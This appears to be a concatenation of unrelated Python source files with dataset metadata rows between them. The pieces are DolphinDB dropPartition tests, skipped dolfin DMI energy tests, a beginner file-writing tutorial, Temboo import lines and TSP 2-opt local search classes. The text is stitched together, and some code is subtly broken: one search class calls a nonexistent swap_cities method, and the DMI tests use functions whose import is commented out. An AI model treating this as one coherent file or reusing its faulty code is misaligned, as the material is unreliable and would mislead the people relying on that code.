assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level3_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level3_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
| 46.777583
| 156
| 0.648921
| 9,979
| 80,130
| 5.007816
| 0.014531
| 0.181778
| 0.161687
| 0.22188
| 0.991655
| 0.991655
| 0.990395
| 0.988214
| 0.986613
| 0.985852
| 0
| 0.065299
| 0.224635
| 80,130
| 1,712
| 157
| 46.804907
| 0.739031
| 0.029315
| 0
| 0.910072
| 0
| 0.027338
| 0.159756
| 0.066209
| 0
| 0
| 0
| 0
| 0.363309
| 1
| 0.039568
| false
| 0
| 0.002878
| 0
| 0.048201
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98dbcf8a711b446f0a43afe841c43ac8e5cb8a72
| 6,324
|
py
|
Python
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 10
|
2018-03-24T07:43:17.000Z
|
2022-03-26T10:42:27.000Z
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 21
|
2018-03-26T15:08:53.000Z
|
2021-07-10T16:11:14.000Z
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 7
|
2018-04-09T11:50:48.000Z
|
2021-06-10T09:23:25.000Z
|
import pytest
import dolfin as df
mesh = df.BoxMesh(df.Point(0, 0, 0), df.Point(1, 1, 1), 10, 10, 10)
V1 = df.VectorFunctionSpace(mesh, "CG", 1)
VT = df.TensorFunctionSpace(mesh, "CG", 1)
Vs = df.FunctionSpace(mesh, "CG", 1)
tf = df.TestFunction(Vs)
#from finmag.energies.dmi import dmi_term3d, dmi_term2d, dmi_term3d_dolfin
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def compare_dmi_term3d_with_dolfin(Mexp):
"""Expects string to feed into df.Expression for M"""
print "Working on Mexp=", Mexp
Mexp = df.Expression(Mexp, degree=1)
M = df.interpolate(Mexp, V1)
E = dmi_term3d(M, tf, 1)[0] * df.dx
E1 = df.assemble(E)
E_dolfin = dmi_term3d_dolfin(M, tf, 1)[0] * df.dx
dolfin_curl = df.project(df.curl(M), V1)
curlx, curly, curlz = dolfin_curl.split()
print "dolfin-curlx=", df.assemble(curlx * df.dx)
print "dolfin-curly=", df.assemble(curly * df.dx)
print "dolfin-curlz=", df.assemble(curlz * df.dx)
E2 = df.assemble(E_dolfin)
print E1, E2
print "Diff is %.18e" % (E1 - E2)
return abs(E1 - E2)
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def compare_dmi_term2d_with_dolfin(Mexp):
"""Expects string to feed into df.Expression for M"""
print "Working on Mexp=", Mexp
Mexp = df.Expression(Mexp, degree=1)
V2d = df.VectorFunctionSpace(mesh, "CG", 1)
M2d = df.interpolate(Mexp, V2d)
M = df.interpolate(Mexp, V1)
E = dmi_term2d(M2d, tf, 1)[0] * df.dx
E1 = df.assemble(E)
E_dolfin = dmi_term3d_dolfin(M, tf, 1)[0] * df.dx
dolfin_curl = df.project(df.curl(M), V1)
curlx, curly, curlz = dolfin_curl.split()
print "dolfin-curlx=", df.assemble(curlx * df.dx)
print "dolfin-curly=", df.assemble(curly * df.dx)
print "dolfin-curlz=", df.assemble(curlz * df.dx)
E2 = df.assemble(E_dolfin)
print E1, E2
print "Diff is %.18e" % (E1 - E2)
return abs(E1 - E2)
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_term2d():
mesh = df.BoxMesh(df.Point(0, 0, 0), df.Point(1, 1, 1), 10, 10, 10)
mesh2d = df.RectangleMesh(df.Point(0, 0), df.Point(1, 1), 10, 10)
eps = 1e-15
assert compare_dmi_term2d_with_dolfin(("x[0]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("x[1]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("x[2]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[0]", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[1]", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[2]", "0.")) < eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[0]")) <eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[1]")) <eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[2]")) <eps
# and some more complicated expressions
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]", "0.5*x[0]", "1")) < eps
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]*x[1]",
"2*0.5*x[0]",
"0")) < eps
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]*x[0]",
"2*0.5*x[0]-x[1]",
"0")) < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_with_analytical_solution():
"""For a vector field a(x,y,z)=0.5 * (-y, x, c),
the curl is exactly 1.0."""
eps = 1e-13
M = df.interpolate(df.Expression(("-0.5*x[1]", "0.5*x[0]", "1"), degree=1), V1)
c = 1.0
E1 = df.assemble(dmi_term3d(M, tf, c)[0] * df.dx)
Eexp = 1.0
print "Expect E=%e, computed E=%e" % (Eexp, E1)
diff = abs(E1 - Eexp)
print "deviation between analytical result and numerical is %e" % diff
assert diff < eps
"""For a vector field a(x,y,z)=0.5 * (-y, x, c),
the curl is exactly 1.0."""
eps = 1e-12
M = df.interpolate(df.Expression(("-0.5*x[1]*2", "0.5*x[0]*2", "1"), degree=1), V1)
c = 3.0
E1 = df.assemble(dmi_term3d(M, tf, c)[0] * df.dx)
Eexp = 6.0
print "Expect E=%e, computed E=%e" % (Eexp, E1)
diff = abs(E1 - Eexp)
print "deviation between analytical result and numerical is %e" % diff
assert diff < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_term3d():
eps = 1e-15
assert compare_dmi_term3d_with_dolfin(("x[0]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("x[1]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("x[2]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[0]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[1]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[2]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[0]")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[1]")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[2]")) < eps
# and some more complicated expressions
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]", "0.5*x[0]", "1")) < eps
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]*x[1]",
"2*0.5*x[0]",
"x[0]+x[1]+x[2]")) < eps
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]*x[0]",
"2*0.5*x[0]-x[2]",
"x[0]+x[1]+x[2]")) < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_can_post_process_form():
M = df.interpolate(df.Expression(("-0.5*x[1]", "0.5*x[0]", "1"), degree=1), V1)
c = 1.0
E = dmi_term3d(M, tf, c)[0] * df.dx
v = df.TestFunction(V1)
dE_dM = df.derivative(E, M, v)
#vol = df.assemble(df.dot(v, df.Constant([1,1,1]))*df.dx).array()
tmp = df.assemble(dE_dM)
g_form = df.derivative(dE_dM, M)
g_petsc = df.PETScMatrix()
df.assemble(g_form, tensor=g_petsc)
#H_dmi_petsc = df.PETScVector()
# if we got to this line, the required assembly to compute fields works.
assert True
if __name__ == "__main__":
# test_dmi_term3d()
# test_dmi_term2d()
# test_can_post_process_form()
test_dmi_with_analytical_solution()
| 41.064935
| 87
| 0.595667
| 1,036
| 6,324
| 3.470077
| 0.132239
| 0.072601
| 0.106815
| 0.105702
| 0.850904
| 0.801113
| 0.79388
| 0.763561
| 0.758554
| 0.750209
| 0
| 0.062016
| 0.224858
| 6,324
| 153
| 88
| 41.333333
| 0.671359
| 0.088868
| 0
| 0.508772
| 0
| 0
| 0.165451
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| null | null | 0
| 0.017544
| null | null | 0.140351
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98de73ed3d146783cd62a9397271d22e1aa78934
| 5,569
|
py
|
Python
|
Writinginafile1.py
|
shyed2001/Python_Programming
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | 2
|
2019-05-01T04:32:14.000Z
|
2019-05-04T11:28:18.000Z
|
Writinginafile1.py
|
shyed2001/python-learning-basics
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | null | null | null |
Writinginafile1.py
|
shyed2001/python-learning-basics
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | null | null | null |
#-------------------------------------------------------------------------------
# Name: Writinginafile1
# Purpose: Learn to Writing in a file
#
# Author: Shyed Shahriar Housaini
#
# Created: 17/09/2019
# Copyright: (c) Shyed Shahriar Housaini 2019
# Licence: Terms from Shyed Shahriar Housaini
#-------------------------------------------------------------------------------
print(""" we can not write in a file which is open in a r read mode """)
print(""" if the file we are trying to write to by w , if that file does
not exist, that will be created, or if it does exist, with the same name,
that file will be overwritten nad may get corrupted """)
with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
pass
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
pass
that code block will only create the file """)
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
fl11.write("rrrr")
that code block will create the file and write rrrr to it""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
fl11.write("rr/nrrrr")
fl11.write("RR\nRRRR")
print(""""
fl1.seek(o) start to write the file from begineening again""")
fl11.seek(0)
fl11.write("WWrite")
fl11.write("\nwww\nWWW/nwww/nWWWrite after seek /0")
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "a") as fl11:
fl11.write("rrrr")
that code block will create the file and write rrrr to it, a insted of w is
used to append= write at the end of existing data""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "a") as fl11:
fl11.write("rr/nrrrr")
fl11.write("RR\nRRRR/nrRrRrRrRappend")
print(""" to read and copy a file and write/create that copy file line by line
we use -
with open("G:/PyWorkDirectory/2PAGLA2.txt", "r") as rf:
with open("G:/PyWorkDirectory/2PAGLA2rfwfcopy.txt", "w") as wf:
for line in rf:
wf.write(line)
""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "r") as rf:
with open("G:/PyWorkDirectory/2PAGLA2rfwfcopy.txt", "w") as wf:
for line in rf:
wf.write(line)
print(""" To copy and write/create an image file the code will be
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/copyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
for line in rbf:
wbf.write(line)
rb an wb is used insted of r and w
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/copyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
for line in rbf:
wbf.write(line)
print(""" reading the picture png file in binary mode chunk by chunk and
copy and create that file-
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/ChunksizecopyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 2560
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
as the file does not write all the binary bites, there will some part of the
picture missing something.
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/ChunkSizecopyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 2560
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2000:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
print(""" reading the picture png file in binary mode chunk by chunk and
copy and create that file-
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/chunksiz640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
as the file does not write all the binary bites, there will some part of the
picture missing something.
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/chunksiz640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 0:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
print("""The write method returns the number of bytes written to a file,
if successful.""")
msg = "Hello world!"
file222 = open("G:/PyWorkDirectory/newfile22.txt", "w")
amount_written = file222.write(msg)
print(amount_written)
file222.close()
print(""" To write something other than a string, it needs to be
converted to a string first.
If a file write operation is successful,
file.write(msg) == len(msg)
statements will be true.
""")
| 39.778571
| 105
| 0.641049
| 799
| 5,569
| 4.386733
| 0.190238
| 0.035663
| 0.142653
| 0.164337
| 0.705563
| 0.705563
| 0.705563
| 0.704137
| 0.704137
| 0.704137
| 0
| 0.034924
| 0.213324
| 5,569
| 139
| 106
| 40.064748
| 0.765122
| 0.068594
| 0
| 0.660714
| 0
| 0.053571
| 0.702263
| 0.283049
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017857
| 0
| 0
| 0
| 0.116071
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c70ad684727ab26b8ed2577de9861f92e7df2c4c
| 606
|
py
|
Python
|
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.SunlightLabs.CapitolWords.Dates import Dates, DatesInputSet, DatesResultSet, DatesChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.FullTextSearch import FullTextSearch, FullTextSearchInputSet, FullTextSearchResultSet, FullTextSearchChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.Phrases import Phrases, PhrasesInputSet, PhrasesResultSet, PhrasesChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.TopPhraseSources import TopPhraseSources, TopPhraseSourcesInputSet, TopPhraseSourcesResultSet, TopPhraseSourcesChoreographyExecution
| 121.2
| 178
| 0.907591
| 44
| 606
| 12.5
| 0.5
| 0.072727
| 0.123636
| 0.210909
| 0.298182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046205
| 606
| 4
| 179
| 151.5
| 0.951557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c71badeebc016b9f3540f2fcf934a2bcd95ea090
| 9,264
|
py
|
Python
|
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | 1
|
2020-06-01T22:56:11.000Z
|
2020-06-01T22:56:11.000Z
|
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | null | null | null |
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
local search implemented with 2-opt swap
2-opt = Switch 2 edges
@author: Tom Monks
"""
from objective import tour_cost
class LocalSearchArgs(object):
"""
Argument class for local search classes
"""
def __init__(self):
pass
class OrdinaryDecent2Opt(object):
"""
Local (neighbourhood) search implemented as first improvement
with 2-opt swaps
"""
def __init__(self, args):
"""
Constructor Method
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self.matrix = args.matrix
self.set_init_solution(args.init_solution)
#self.swapper = args.swapper
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = tour_cost(self.solution, self.matrix)
def solve(self):
"""
Run solution algoritm.
Note: algorithm is the same as ordinary decent
where 2 customers are swapped apare from call to swap
code. Can I encapsulate the swap code so that it can be reused?
"""
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
#print("city1: {0}".format(city1))
for city2 in range(city1 + 1, len(self.solution) - 1):
#print("city2: {0}".format(city2))
self.reverse_sublist(self.solution, city1, city2)
new_cost = tour_cost(self.solution, self.matrix)
#if (new_cost == self.best_cost):
#self.best_solutions.append(self.solution)
#improvement = True
if (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
self.reverse_sublist(self.solution, city1, city2)
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end+1] = reversed(lst[start:end+1])
return lst
class OrdinaryDecent2OptNew(object):
"""
Local (neighbourhood) search implemented as first improvement
with 2-opt swaps
"""
def __init__(self, objective, init_solution):
"""
Constructor Method
Parameters:
objective - objective function
init_solution = initial tour
"""
self._objective = objective
self.set_init_solution(init_solution)
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = self._objective.evaluate(self.solution)
def solve(self):
"""
Run solution algoritm.
Note: algorithm is the same as ordinary decent
where 2 customers are swapped apare from call to swap
code. Can I encapsulate the swap code so that it can be reused?
"""
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
#print("city1: {0}".format(city1))
for city2 in range(city1 + 1, len(self.solution) - 1):
#print("city2: {0}".format(city2))
self.reverse_sublist(self.solution, city1, city2)
#new_cost = tour_cost(self.solution, self.matrix)
new_cost = self._objective.evaluate(self.solution)
#if (new_cost == self.best_cost):
#self.best_solutions.append(self.solution)
#improvement = True
if (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
self.reverse_sublist(self.solution, city1, city2)
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
Parameters:
--------
lst - np.array, vector representing a solution
start - int, start index of sublist (inclusive)
end - int, end index of sublist (inclusive)
"""
lst[start:end] = lst[start:end][::-1]
class OrdinaryDecent2OptNew__(object):
"""
Local (neighbourhood) search implemented as first improvement
"""
def __init__(self, objective, init_solution):
"""
Constructor Method
Parameters:
----------
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self._objective = objective
self.set_init_solution(init_solution)
#self.swapper = args.swapper unused?
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
#self.best_cost = tour_cost(self.solution, self.matrix)
self.best_cost = self._objective.evaluate(solution)
def solve(self):
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
for city2 in range(city1 + 1, len(self.solution) - 1):
self.reverse_sub_list(self.solution, city1, city2)
#new_cost = tour_cost(self.solution, self.matrix)
new_cost = self._objective.evaluate(self.solution)
if (new_cost == self.best_cost):
self.best_solutions.append(self.solution)
improvement = True
elif (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
self.swap_cities(city1, city2)
def reverse_sub_list(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end] = lst[start:end][::-1]
return lst
class SteepestDecent2Opt(object):
"""
Local (neighbourhood) search implemented as steepest decent
with 2-opt swaps
"""
def __init__(self, args):
"""
Constructor Method
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self.matrix = args.matrix
self.set_init_solution(args.init_solution)
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = tour_cost(self.solution, self.matrix)
def solve(self):
improvement = True
best_swap_city1 = 0
best_swap_city2 = 0
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
for city2 in range(city1 + 1, len(self.solution) - 1):
self.reverse_sublist(self.solution, city1, city2)
new_cost = tour_cost(self.solution, self.matrix)
if (new_cost < self.best_cost):
self.best_cost = new_cost
best_swap_city1 = city1
best_swap_city2 = city2
improvement = True
self.reverse_sublist(self.solution, city1, city2)
self.reverse_sublist(self.solution, best_swap_city1, best_swap_city2)
self.best_solutions = [self.solution]
best_swap_city1 = 0
best_swap_city2 = 0
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end+1] = reversed(lst[start:end+1])
return lst
| 32.391608
| 82
| 0.490933
| 881
| 9,264
| 5.00681
| 0.137344
| 0.111539
| 0.046248
| 0.0399
| 0.881886
| 0.866243
| 0.824756
| 0.804579
| 0.791884
| 0.747223
| 0
| 0.016837
| 0.429404
| 9,264
| 286
| 83
| 32.391608
| 0.817631
| 0.229383
| 0
| 0.830357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151786
| false
| 0.008929
| 0.008929
| 0
| 0.232143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
